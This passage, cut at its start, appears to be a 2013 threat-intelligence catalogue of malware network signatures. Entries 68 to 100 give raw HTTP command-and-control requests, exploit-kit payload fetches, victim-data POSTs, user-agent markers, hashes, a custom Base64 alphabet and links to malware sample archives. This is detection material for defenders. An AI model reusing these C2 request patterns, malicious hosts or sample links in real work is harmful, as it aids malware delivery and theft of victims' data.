User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: qkvuz.12taglik.info
Connection: Keep-Alive
Notes: some payload | MD5s: TTF: CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot; CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
Sample: http://bit.ly/crimesamples | Date: 2013-08 | Ref: http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
68
8/13/2013 | Crime | EK Popads | GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar HTTP/1.1
GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar HTTP/1.1
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07
Host: fizv.11taglik.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

Notes: some payload | MD5s: TTF: CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot; CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
Sample: http://bit.ly/crimesamples | Date: 2013-08 | Ref: http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
69
8/13/2013 | Crime | EK Popads | GET /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in HTTP/1.1
GET /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: tqhsy.8taglik.info
Connection: Keep-Alive
Notes: some payload | MD5s: TTF: CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot; CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
Sample: http://bit.ly/crimesamples | Date: 2013-08 | Ref: http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
70
8/13/2013 | Crime | EK Popads | GET /39ff9ff8c3b603d8eed017df64dd2799.eot HTTP/1.1
GET /39ff9ff8c3b603d8eed017df64dd2799.eot HTTP/1.1
Accept: */*
Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: fizv.11taglik.info
Connection: Keep-Alive
MD5s: TTF: CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot | Sample: http://bit.ly/crimesamples | Date: 2013-08 | Ref: http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
71
4/28/2013 | APT | Enfal / Lurid | GET /oi2c/wlc3/[redacted]:00-00-00-00-00-00/ij83d HTTP/1.1
GET /oi2c/wlc3/[redacted]:00-00-00-00-00-00/ij83d HTTP/1.1
Host: home.coffeeibus.com
Cache-Control: no-cache
Notes: New Enfal checks if commands have been specified.
Pcap: http://bit.ly/aptpcaps | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
72
4/28/2013 | APT | Enfal / Lurid | GET /trandocs/nm/.[redacted]:00-00-00-00-00-00lCrrrwhite HTTP/1.1
GET /trandocs/nm/.[redacted]:00-00-00-00-00-00lCrrrwhite HTTP/1.1
Host: note.webmail-temp.com
Cache-Control: no-cache
Notes: Enfal checks if commands have been specified.
Pcap: http://bit.ly/aptpcaps | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
73
4/28/2013 | APT | Enfal / Lurid | POST /cgi-bin/CMS_SubitAll.cgi HTTP/1.1
POST /cgi-bin/CMS_SubitAll.cgi HTTP/1.1
Host: virustotel.3-a.net
Content-Length: 115
Cache-Control: no-cache
Notes: New Enfal POSTs the victim's details to the C&C server.
Pcap: http://bit.ly/aptpcaps | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
74
4/28/2013 | APT | Enfal / Lurid | POST /cgl-bin/Owpq4.cgi HTTP/1.1
POST /cgl-bin/Owpq4.cgi HTTP/1.1
Host: note.webmail-temp.com
Content-Length: 83
Cache-Control: no-cache
Notes: Posts the victim's details to the C&C server.
Pcap: http://bit.ly/aptpcaps | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
75
4/28/2013 | APT | Enfal / Lurid | POST /Sjwpc/odw3ux HTTP/1.1
POST /Sjwpc/odw3ux HTTP/1.1
Host: hone.coffeeibus.com
Content-length: 104
Cache-Control: no-cache
Notes: Original Enfal POSTs the victim's details to the C&C server.
Pcap: http://bit.ly/aptpcaps | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
76
4/30/2013 | Crime | FakeAV var (via Kuluoz - Asprox botnet) | GET /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F HTTP/1.1
GET /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 208.88.5.229:808
Port: 808 | UA: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | MD5: b64b5af4262cf23f3fbc54448c6311d8 | Ref: http://www.nsai.it/2013/01/23/italian-dhl-spam/ https://www.virustotal.com/en/file/c49f7dbc036ad0a86df02cbbde00cb3b3fbd651d82f6c9c5a98170644374f64f/analysis/
77
4/30/2013 | APT | Favorites | GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1)
Host: 140.112.19.195
Connection: Keep-Alive
Notes: Download file to victim | UA: Mozilla/5.0 (compatible; Windows NT 5.1) | MD5: 5e3eaca3806769836c3ad9d46a209644 | Date: 2010-09 | Ref: http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
78
4/30/2013 | APT | Favorites | GET /search?qu= HTTP/1.1
GET /search?qu= HTTP/1.1
User-Agent: Firefox/2.0.0.2
Host: www.google.com
Content-Length: 4
Connection: Keep-Alive
Notes: Trojan first beacons to www.google.com. This is a decoy beacon that does not affect the behavior of the Trojan in any way. | MD5: 5e3eaca3806769836c3ad9d46a209644 | Date: 2010-09 | Ref: http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
79
4/30/2013 | APT | Favorites | GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;)
Host: 140.112.19.195
Connection: Keep-Alive
Where: search5 is a hardcoded value, whereas: 5910 is a random number.
And: ?h1= is hardcoded, whereas: 51 is the Windows version (i.e. Win XP 5.1)
And: &h2=1&h3= is hardcoded, as is: BHI06233
And: &h4= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the encoded (volume serial number concatenated with a random number)
And: BKANAHEAFPEM is the encoded machine name (in this case victim).
UA: Mozilla/5.0 (compatible;BKANAHEAFPEM;) | MD5: 5e3eaca3806769836c3ad9d46a209644 | Date: 2010-09 | Ref: http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
80
4/30/2013 | APT | Favorites | GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2)
Host: 140.112.19.195
Connection: Keep-Alive
Notes: The Trojan continues the communication with the C2 node by sending this GET request. | UA: Mozilla/5.0 (compatible; Windows NT 5.2) | MD5: 5e3eaca3806769836c3ad9d46a209644 | Date: 2010-09 | Ref: http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
81
4/30/2013 | APT | Favorites | POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1
POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1)
Host: 140.112.19.195
Content-Length: 127
Connection: Keep-Alive
Cache-Control: no-cache
Notes: Command Shell. This command takes no arguments. The Trojan executes cmd.exe on the local machine and sends the following POST request to the C2 node.
UA: Mozilla/5.0 (compatible;Windows NT 5.1) | MD5: 5e3eaca3806769836c3ad9d46a209644 | Date: 2010-09 | Ref: http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
82
4/30/2013 | APT | Favorites | POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1
POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2)
Host: 140.112.19.195
Content-Length: 41
Connection: Keep-Alive
Cache-Control: no-cache
Notes: POST request to the C2 node followed by the encrypted data of the requested file (shown as a hex dump in the referenced article). | UA: Mozilla/5.0 (compatible;Windows NT 5.2) | MD5: 5e3eaca3806769836c3ad9d46a209644 | Date: 2010-09 | Ref: http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
83
4/28/2013 | Crime | Flashback OSX | GET /statistics.html HTTP/1.1
GET /statistics.html HTTP/1.1
Host: cuojshtbohnt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1
UA: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 | MD5: 5616687FAC5D040AE65CB1B08717A6AA | Date: 2012-04 | Ref: http://contagiodump.blogspot.com/2012/04/i-have-been-tracking-infections-too-and.html
84
4/28/2013 | APT | Foxy | POST /404error.asp HTTP/1.1
POST /404error.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
UA: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) | MD5: d271ae0f4e9230af3b61eafe7f671fde | Date: 2011-08 | Ref: http://www.cyberengineeringservices.com/364/
85
4/28/2013 | APT | Foxy Checkin | GET /images/leftnav_prog_bg.jpg HTTP/1.1
GET /images/leftnav_prog_bg.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Cache-Control: no-cache
UA: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) | MD5: d271ae0f4e9230af3b61eafe7f671fde | Date: 2011-08 | Ref: http://www.cyberengineeringservices.com/364/
86
5/2/2013 | Crime | GameThief | GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 HTTP/1.1
GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 HTTP/1.1
User-Agent: Google page
Host: 198.105.210.180
Cache-Control: no-cache
UA: Google page | MD5s: ECBA0FEB36F9EF975EE96D1694C8164C, 4e4ea8acc683bdd054e032f8a2895c74
Sample: http://bit.ly/crimesamples | Pcap: http://bit.ly/crimepcaps | Date: 2013-03 | Ref: http://www.threatexpert.com/report.aspx?md5=ecba0feb36f9ef975ee96d1694c8164c
87
5/1/2013 | Crime | Gapz C&C request | POST / HTTP/1.0 (Host: hvqnut3kurg3lku.strangled.net)
POST / HTTP/1.0
Host: hvqnut3kurg3lku.strangled.net
Content-Type: multipart/form-data; boundary=G5tlHz50h7nHCmL07Pi
Content-Length: 598
User-Agent: Moziila/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0

--G5tlHz50h7nHCmL07Pi
Content-Disposition: form-data; name="kchVFAau"; filename="BjaYJT0pQJjoeZ.7z"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
UA: Moziila/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0 | MD5: E5B9295E0B147501F47E2FCBA93DEB6C (dropper) | Date: 2013-04 | Ref: http://www.welivesecurity.com/2013/04/08/is-gapz-the-most-complex-bootkit-yet/
88
4/30/2013 | APT | Gh0st | GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache
UA: Mozilla/4.0 (compatible; MSIE 6.0; Win32) | MD5s: 04e237ad7f600bfc942f326f903dc9d8, 6a5dde931418e0549163fdb024e4f2ed, 265b38204738c9c0adc612142f861022
Date: 2013-04 | Ref: http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/
89
5/12/2013 | APT | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1
Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1
MD5: 122B34A05530316E919604EF52EB9F1A | Date: 2013-05 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html
90
4/28/2013 | APT | Gh0st ASP ver | GET /1/v2/1oginv2.asp?hi2wsdf351&x.'..[xf)..<.3XqHr....)IL{..&y192.168.O.69 HTTP/1.1
GET /1/v2/1oginv2.asp?hi2wsdf351&x.'..[xf)..<.3XqHr....)IL{..&y192.168.O.69 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: .palms-us.org
UA: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
91
4/28/2013 | APT | Gh0st PHP ver | GET /ld/queenfun/vl/login.php?cd2hpdGU&uU11TVEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l HTTP/1.1
GET /ld/queenfun/vl/login.php?cd2hpdGU&uU11TVEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: .ibmunion.net
UA: Mozilla/4.0 (compatible; ) | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
92
4/28/2013 | APT | Gh0st v2000 var | v2010........f...............(
......Service Pack 2..?..|...|...|0.@..
v2010........f...............(
......Service Pack 2..?..|...|...|0.@..............4$..............4$..^.....|.....]...]......{l....$.0%.|.....a2.rSingleO....t.....2.........d
....j.DELLXT..............................................g...00-50-56-3C-F6-41...'.......
MD5: B1D09374006E20FA795B2E70BF566C6D | Pcap: http://bit.ly/aptpcaps | Date: 2012-08 | Ref: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
93
4/30/2013 | APT | Gh0st var | GET /h.gif?pid=113&v=130586214568 HTTP/1.1
GET /h.gif?pid=113&v=130586214568 HTTP/1.1
Accept: /
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive

HTTP/1.0 200 OK
Content-type: text/html
Content-Length: 0
PCRatb . . . X. . . x . . . q. s. 2406. . . . S. . P. . c. 1. 4R. u. . .1—I . . . .1.1I
..al..bf.....ga..QUS.Z\..._\ s..PCRat x
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | Date: 2012-06 | Ref: http://labs.alienvault.com/labs/index.php/2012/new-macontrol-variant-targeting-uyghur-users-the-windows-version-using-gh0st-rat/
94
4/29/2013 | APT | Glasses | GET /ewpindex.htm HTTP/1.1
GET /ewpindex.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache
Notes: The HTTP request includes a marker in the User-Agent string, indicating that it was sent by this malware. The marker string has two parts, separated by a period. The first part ("Clj26Dbj") is an encoded version of the computer's name, presumably for tracking which machines at an organization are infected. The second part (changed to "XYZ" here) appears to be a campaign code. | Date: 2013-02 | Ref: https://citizenlab.org/2013/02/apt1s-glasses-watching-a-human-rights-organization/
95
4/28/2013 | APT | GoogleAdC2 | GET /html/lost.html HTTP/1.1
GET /html/lost.html HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: news.googleupdateservices.com
Connection: Keep-Alive
The Trojan parses the HTML file data for the following content:
<!-- google_adINSTRUCTION height --> So, an example of what file lost.html may contain may look like this:
<!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height -->
MD5: 90993b5279365b204148e8b04edf477f | Date: 2011-11 | Ref: http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
96
4/28/2013 | APT | GoogleAdC2 2nd stage | GET /Trojan2.jpg HTTP/1.1
GET /Trojan2.jpg HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: www.reallybad.com
Connection: Keep-Alive
The downloaded file is expected to be Base64 encoded using the following custom alphabet:
abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234
UA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | MD5: 90993b5279365b204148e8b04edf477f | Date: 2011-11 | Ref: http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
97
4/28/2013 | APT | Googles | GET /sll/monica.jpg HTTP/1.1
GET /sll/monica.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; =1j2CVh2s#IE6DBo6Iru; MNA)
Host: www.avvmail.com
Cache-Control: no-cache
Notes: GOGGLES will periodically request a pre-configured URL, which contains encoded commands to either sleep or download and execute another URL. The GOGGLES downloader makes extensive use of data encoding and encapsulation to obscure network traffic. GOGGLES is designed to request a URL that is stored encoded in its resource section and then extract and decode a second URL from the data returned from the server. The first HTTP GET request's User-Agent string will include the encoded name of the local system; the request above is an example of the first HTTP GET request.
Known UAs:
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
Mozilla/4.0(compatible;WindowsNT5.1;MSIE8.0)
Mozilla/4.0(compatible;WindowsNT5.1;MSIE7.0;Trident/4.0
MD5: BF80DBF969B73790253F683CD723FD71 | Date: 2009-07 | Ref: http://intelreport.mandiant.com/
98
4/28/2013 | APT | Greencat | GET /<HOSTNAME>/ HTTP/1.1
GET /<HOSTNAME>/ HTTP/1.1
Accept: /
Pragma: no-cache
Cache-Control: max-age=0
Cache-Control: no-cache
Connection: Keep-Alive
Computer: <HOSTNAME>
User-Agent: Mozilla/4.0
Host: flash.aunewsonline.com
Content-Length: <ContentLength>

<HOSTNAME> Connected!
Notes: GREENCAT communicates using SSL. Within the SSL tunnel the initial GET request
Known UAs: Mozilla/4.0; Mozilla/4.0(compatible;MSIE8.0;WindowsNT5.1;SV1) o Mozilla/5.0; Mozilla/4.0
MD5: 57e79f7df13c0cb01910d0c688fcd296 | Date: 2012-04 | Ref: http://intelreport.mandiant.com/
99
4/28/2013 | APT | Gtalk | GET /facebook.png HTTP/1.1
GET /facebook.png HTTP/1.1
Accept: /
User-Agent: [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32)
Host: [redacted]
UA: [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32) | Date: 2012 | Ref: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
100
4/30/2013 | Crime | Guntior - CN bootkit | GET /yx/tongji.html HTTP/1.1
GET /yx/tongji.html HTTP/1.1
Accept: /..
Accept-Language: en-u
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: localhost:690
Connection: Keep-Alive
UA: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727) | MD5: 15e692cf34a70fb364591622bff1e43a | Date: 2012-12 | Ref: http://www.threatexpert.com/report.aspx?md5=15e692cf34a70fb364591622bff1e43a